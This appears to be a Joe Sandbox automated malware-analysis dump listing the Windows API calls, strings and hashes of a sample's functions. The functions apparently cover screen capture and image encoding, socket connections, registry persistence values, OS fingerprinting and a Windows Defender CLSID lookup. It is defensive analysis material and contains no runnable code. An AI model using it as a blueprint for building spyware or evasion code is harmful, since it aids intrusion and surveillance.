                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 640422297-3042966939
                                                                                                                                                                      • Opcode ID: ca23fb054b17ca01fa60f33de9e09feb229a511bdb8f42ac40e5d4b3cc464c15
                                                                                                                                                                      • Instruction ID: ca6a6e2576496fabb0241c64b02ae306b62fc75a33b63ea3e1c08149c94746ae
                                                                                                                                                                      • Opcode Fuzzy Hash: ca23fb054b17ca01fa60f33de9e09feb229a511bdb8f42ac40e5d4b3cc464c15
                                                                                                                                                                      • Instruction Fuzzy Hash: 7CD131B1A002199FDB64DF55CC84BAAB7B4EF88304F0485ADE709A7301D774AA85CFA5

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03772DBB
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03772DC7
                                                                                                                                                                      • timeGetTime.WINMM ref: 03772DCD
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 03772DFA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03772E26
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03772E32
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03772E51
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03772E5D
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 03772E6B
                                                                                                                                                                      • htons.WS2_32(?), ref: 03772E8D
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 03772EAB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                      • Opcode ID: 3b5e36fd818848402e926f799c5613c9f2da94b79850b242be8e6d665ef17584
                                                                                                                                                                      • Instruction ID: cf604104ba9c1519b54481c0405767397d2270e351081f7668072620f447bad5
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b5e36fd818848402e926f799c5613c9f2da94b79850b242be8e6d665ef17584
                                                                                                                                                                      • Instruction Fuzzy Hash: 34615371A40308BFD720EFA4DC45FAAB7B8FF4C710F10461AF655AB2D1D6B4A9058B64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C62D9B
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C62DA7
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C62DAD
                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 02C62DDA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C62E06
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C62E12
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C62E31
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C62E3D
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C62E4B
                                                                                                                                                                      • htons.WS2_32(?), ref: 02C62E6D
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C62E8B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                      • String ID: 0u
                                                                                                                                                                      • API String ID: 640718063-3203441087
                                                                                                                                                                      • Opcode ID: a1ca45a2228b19abe9a10cfc8c5aad20fbb87cea7147010d1cf6c59061239e2c
                                                                                                                                                                      • Instruction ID: 4d31dec15080dc749b7db859735ce05d205747bb6bd8011a4c7c498d9d826ee0
                                                                                                                                                                      • Opcode Fuzzy Hash: a1ca45a2228b19abe9a10cfc8c5aad20fbb87cea7147010d1cf6c59061239e2c
                                                                                                                                                                      • Instruction Fuzzy Hash: CD6144B1A40704AFE720DFA4DC85FAAB7B9FF48711F504619FA46A72C0D7B0A904CB65

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0377AD53
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0377AD73
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenQueryValue
                                                                                                                                                                      • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                                                                      • API String ID: 4153817207-1338088003
                                                                                                                                                                      • Opcode ID: af5279f64d0b62e7471047293b3e3d9cb2a6b6c09cfa9a9d8a6a71404a962f3a
                                                                                                                                                                      • Instruction ID: fe9118c6984f62d37b4bfb2291ef9f7fa9989bbe07e3ce37d0ec07c6db5b1432
                                                                                                                                                                      • Opcode Fuzzy Hash: af5279f64d0b62e7471047293b3e3d9cb2a6b6c09cfa9a9d8a6a71404a962f3a
                                                                                                                                                                      • Instruction Fuzzy Hash: B4C1F6B6A00300ABEB10EF24DC45F6B73A8EF94714F084569F9459B382E775E905C7A2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03775F66
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03775F6E
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03775F85
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03775F90
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03775F92
                                                                                                                                                                      • _memset.LIBCMT ref: 03775FB9
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03775FC6
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,03795328), ref: 03775FED
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 03775FF8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 03776005
                                                                                                                                                                      • GetConsoleWindow.KERNEL32 ref: 0377600F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                                                                      • String ID: 2024.12. 3$key$open
                                                                                                                                                                      • API String ID: 2922109467-4129338558
                                                                                                                                                                      • Opcode ID: 11db658df9268671dd418f1652a25977622b4187f21528df5656d4cee96403b0
                                                                                                                                                                      • Instruction ID: 18af511dffe48ca81c5b52ffb1ff30f1f1b801b51fcded050f7255d36a40dbb1
                                                                                                                                                                      • Opcode Fuzzy Hash: 11db658df9268671dd418f1652a25977622b4187f21528df5656d4cee96403b0
                                                                                                                                                                      • Instruction Fuzzy Hash: 17213772A0430DAFEA10FB64EC45F5E73A89B84714F144A2AE6049B1C5DB74E50AC7A3

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 037762CE
                                                                                                                                                                      • wsprintfW.USER32 ref: 03776336
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0377635F
                                                                                                                                                                      • _memset.LIBCMT ref: 03776376
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037763B2
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,?), ref: 037763CE
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,0379535C), ref: 037763DA
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 037763E3
                                                                                                                                                                      • lstrlenW.KERNEL32(037A1F10,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 03776427
                                                                                                                                                                      • lstrcatW.KERNEL32(037A1F10,037953D4,?,A0516FA3,00000AD4,00000000,75BF73E0), ref: 0377643B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                                                                      • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                      • API String ID: 1671694837-1583895642
                                                                                                                                                                      • Opcode ID: 3d003c6c4eab97002231a8ea2db771e6768a122c79dc14e202ea50983ddaf006
                                                                                                                                                                      • Instruction ID: 019c36a47af499598a0b4a3c5d822704b1ec585861d2dd1c96961303bc236a9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d003c6c4eab97002231a8ea2db771e6768a122c79dc14e202ea50983ddaf006
                                                                                                                                                                      • Instruction Fuzzy Hash: 4241A1F1A40668AEDB24DB54CC55FEEB7B8AB88704F0442C9F309A7186D6749B81CF64

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03775611,0000035E,000002FA), ref: 0377749C
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037774B2
                                                                                                                                                                      • swprintf.LIBCMT ref: 037774EF
                                                                                                                                                                        • Part of subcall function 03777410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03777523), ref: 0377743D
                                                                                                                                                                        • Part of subcall function 03777410: GetProcAddress.KERNEL32(00000000), ref: 03777444
                                                                                                                                                                        • Part of subcall function 03777410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03777523), ref: 03777452
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03777547
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03777563
                                                                                                                                                                      • RegCloseKey.KERNEL32(000002FA), ref: 03777586
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,03775611,0000035E,000002FA), ref: 03777598
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                                                                      • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                                                                      • API String ID: 2158625971-3190923360
                                                                                                                                                                      • Opcode ID: 8cf36512839cd01f0dcef8deb1bea09f4621f6e43b924f96e24ccda8cba9e670
                                                                                                                                                                      • Instruction ID: 547f32ca5abd7d5bbe8924fcb723ddc18e6f214eaa0effda0bbbf92dd46c7da3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cf36512839cd01f0dcef8deb1bea09f4621f6e43b924f96e24ccda8cba9e670
                                                                                                                                                                      • Instruction Fuzzy Hash: 3031B3B5A40308BBEF18EBA4DD45EBF7B7DDB48640F14461AFA05A6146E674DA00C7A0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,?,A0516FA3,?,00000000,?), ref: 0377C09E
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0377C0AA
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0377C0BF
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0377C0D5
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64), ref: 0377C113
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64), ref: 0377C124
                                                                                                                                                                        • Part of subcall function 03779DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03779E04
                                                                                                                                                                        • Part of subcall function 03779DE0: GdipDisposeImage.GDIPLUS(?), ref: 03779E18
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0377C14C
                                                                                                                                                                        • Part of subcall function 0377A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0377A48D
                                                                                                                                                                        • Part of subcall function 0377A460: _free.LIBCMT ref: 0377A503
                                                                                                                                                                      • GetHGlobalFromStream.OLE32(?,?), ref: 0377C16D
                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 0377C177
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0377C18F
                                                                                                                                                                        • Part of subcall function 03779BA0: DeleteObject.GDI32(?), ref: 03779BD2
                                                                                                                                                                        • Part of subcall function 03779BA0: EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BE3
                                                                                                                                                                        • Part of subcall function 03779BA0: EnterCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779BF8
                                                                                                                                                                        • Part of subcall function 03779BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03779B7B), ref: 03779C04
                                                                                                                                                                        • Part of subcall function 03779BA0: LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C15
                                                                                                                                                                        • Part of subcall function 03779BA0: LeaveCriticalSection.KERNEL32(0379FB64,?,?,?,03779B7B), ref: 03779C1C
                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0377C1A5
                                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 0377C221
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0377C249
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1483550337-0
                                                                                                                                                                      • Opcode ID: e333a28fe7bd0500b68eb568d3bf82cb031ba832698464be7ee179008a8af412
                                                                                                                                                                      • Instruction ID: d368b340142e0c5ef68f7241a405f712ee075b62f9fc1bd6775d60bb24d92fd2
                                                                                                                                                                      • Opcode Fuzzy Hash: e333a28fe7bd0500b68eb568d3bf82cb031ba832698464be7ee179008a8af412
                                                                                                                                                                      • Instruction Fuzzy Hash: AB614BB5D0021DEFDF10EFA8D88899EBBB8FF49710F10862AE515AB201DB349906CF50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 037764C2
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037764E2
                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03776524
                                                                                                                                                                      • _memset.LIBCMT ref: 03776560
                                                                                                                                                                      • _memset.LIBCMT ref: 0377658E
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765BA
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765C3
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037765D5
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03776625
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 03776635
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Tencent\Plugin\VAS, xrefs: 037764D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                                                                      • String ID: Software\Tencent\Plugin\VAS
                                                                                                                                                                      • API String ID: 2921034913-3343197220
                                                                                                                                                                      • Opcode ID: df5926fe2735e04975fa89453bb97df957786e52e1df3aa2fba6b5902b2fd1e5
                                                                                                                                                                      • Instruction ID: 646747d270d9d4e3e28da14f7a28ba035ee289f0e0975c3f1606fe7649216a83
                                                                                                                                                                      • Opcode Fuzzy Hash: df5926fe2735e04975fa89453bb97df957786e52e1df3aa2fba6b5902b2fd1e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 414197F5A4021CBBDB34EB54CD85FEAB37DDB48700F404599E709B7085EA70AA858FA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0377A48D
                                                                                                                                                                      • _malloc.LIBCMT ref: 0377A4D1
                                                                                                                                                                      • _free.LIBCMT ref: 0377A503
                                                                                                                                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0377A522
                                                                                                                                                                      • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0377A594
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0377A59F
                                                                                                                                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0377A5C5
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(00000000), ref: 0377A5DD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                                                                      • String ID: &
                                                                                                                                                                      • API String ID: 2794124522-3042966939
                                                                                                                                                                      • Opcode ID: 78df209799f19235550f4dd0adf8cc7148d4f6e0b6214ba97010de9f5fbc53c8
                                                                                                                                                                      • Instruction ID: 6806dcc5639044ec920cb9fcd8b1d4775be5ff4c3db0e1745a74ed0e61ee4c7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 78df209799f19235550f4dd0adf8cc7148d4f6e0b6214ba97010de9f5fbc53c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 25515775D01219AFEF54EFA4D848EEEB7B8AF4C740F048559E905AB350D734A905CBE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C65382
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C65392
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C7C6E0,000012A0), ref: 02C653B0
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C653BB
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C6540F
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C6541B
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C65434
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                      • Opcode ID: 0820d44fcda2aaa58cf1ed925fbc5d0f297524f15e20a068f76598328ef08b15
                                                                                                                                                                      • Instruction ID: 42e4a8aa6bbd6c4d29836d951defa82327ee23ab81bb9f9b0f2d22bdc8c34290
                                                                                                                                                                      • Opcode Fuzzy Hash: 0820d44fcda2aaa58cf1ed925fbc5d0f297524f15e20a068f76598328ef08b15
                                                                                                                                                                      • Instruction Fuzzy Hash: 53413B31A842859FD3108F3488CDF7A7BA5EF85B84FFC0569E589D6142D7B0DA0AC791
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02C65382
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02C65392
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02C7C6E0,000012A0), ref: 02C653B0
                                                                                                                                                                      • RegCloseKey.KERNEL32(?), ref: 02C653BB
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02C6540F
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,?), ref: 02C6541B
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 02C65434
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                      • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                      • API String ID: 864241144-2243437601
                                                                                                                                                                      • Opcode ID: a6b56000a86b1d748d02cd9650c00aabe69d6cc57e68e612fda96ea90b50eeef
                                                                                                                                                                      • Instruction ID: 63d6e3dbb1725607adb4fc3297d85b3f4b4e77b697ef4c6e6ae3a821c47dfca8
                                                                                                                                                                      • Opcode Fuzzy Hash: a6b56000a86b1d748d02cd9650c00aabe69d6cc57e68e612fda96ea90b50eeef
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31B9306843859FD711CF30889DF797BA5AF85784FEC0969E6899A142C7B0DA0AC791
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,037912F8,A0516FA3,00000001,00000000,00000000), ref: 0377CAB1
                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(037912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0377CAE0
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CB44
                                                                                                                                                                      • _memset.LIBCMT ref: 0377CB53
                                                                                                                                                                      • RegEnumValueW.KERNEL32(037912F8,?,00000000,?,00000000,?,00000000,?), ref: 0377CB72
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F756
                                                                                                                                                                        • Part of subcall function 0377F707: std::exception::exception.LIBCMT ref: 0377F770
                                                                                                                                                                        • Part of subcall function 0377F707: __CxxThrowException@8.LIBCMT ref: 0377F781
                                                                                                                                                                      • RegCloseKey.KERNEL32(037912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,037912F8,000000FF), ref: 0377CC83
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                                                                      • String ID: Console\0
